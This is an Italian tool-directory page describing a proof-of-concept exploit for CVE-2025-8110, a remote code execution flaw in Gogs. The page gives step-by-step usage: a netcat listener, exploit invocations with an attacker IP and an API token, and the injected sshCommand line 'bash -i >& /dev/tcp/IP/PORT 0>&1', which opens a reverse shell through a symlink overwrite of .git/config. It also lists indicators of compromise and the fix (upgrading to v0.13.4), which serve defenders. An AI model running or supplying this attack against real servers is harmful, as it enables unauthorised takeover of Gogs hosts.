Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-8110 — Gogs RCE PoC - CVE-2025-8110 | Kitploit
Strumenti/GitHubGitHub/x4brozer/cve-2025-8110
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubx4brozer/cve-2025-8110

CVE-2025-8110

Gogs RCE PoC - CVE-2025-8110

Vedi Repository
4 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit RCE di Gogs (CVE-2025-8110)

Python License

Proof of Concept per CVE-2025-8110 - Esecuzione di codice remoto in Gogs tramite bypass di symlink e iniezione di sshCommand.

Descrizione

Questo exploit abusa di un bypass di symlink nell'API di Gogs per sovrascrivere .git/config e iniettare un sshCommand malevolo che esegue una reverse shell.

Requisiti

  • Python 3.12+
  • Git installato
  • Credenziali Gogs valide
  • Token API Gogs

Installazione

root@kitploit:~
git clone https://github.com/X4BROZER/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt

Argomento Descrizione -u, --url URL target di Gogs (es. http://target:3000) -U, --username Nome utente Gogs -P, --password Password Gogs -t, --token Token API Gogs -lh, --host Il tuo IP per la reverse shell -lp, --port La tua porta per il listener -x, --proxy Abilita proxy (localhost:8080)

Utilizzo

Passo 1: Ottieni il token API

Accedi a Gogs → Impostazioni → Applicazioni → Genera token

Passo 2: Avvia il listener

root@kitploit:~
nc -lvnp 4444

Passo 3: Esegui l'exploit

root@kitploit:~
python3 exploit.py -u http://target:3000 -U <NOME_UTENTE_GOGS> -P <PASSWORD_GOGS> -t <TOKEN> -lh <IP_ATTACCANTE> -lp <PORTA_ATTACCANTE>

Esempio

root@kitploit:~
python3 exploit.py -u http://localhost:3001 -U amine -P amine -t 44f4e64a1e6353f247050055aa0d3cc13b577ac3 -lh 10.10.17.134 -lp 4444

Come funziona

  • Crea un repository con symlink a .git/config
  • Usa l'API PutContents per scrivere al symlink
  • Inietta sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #
  • Gogs esegue il comando → reverse shell

Risoluzione dei problemi

Problema Soluzione Accesso fallito Controlla nome utente/password Creazione repository fallita Rigenera il token API Timeout di lettura Normale - controlla il listener Nessuna shell Controlla il firewall, prova una porta diversa

Indicatori di compromissione

  • Nomi di repository casuali di 8 caratteri
  • malicious_link symlink nei repository
  • sshCommand in .git/config

Rimedi

Aggiorna a Gogs v0.13.4 o successivo:

root@kitploit:~
wget https://dl.gogs.io/v0.13.4/gogs_v0.13.4_linux_amd64.tar.gz
tar -xzf gogs_v0.13.4_linux_amd64.tar.gz

Disclaimer legale

Questo strumento è solo per test educativi e autorizzati. L'accesso non autorizzato è illegale.

Riconoscimenti

Scoperta: Wiz Research

PoC originale: zAbuQasem

Exploit: X4BROZER

Scarica lo strumento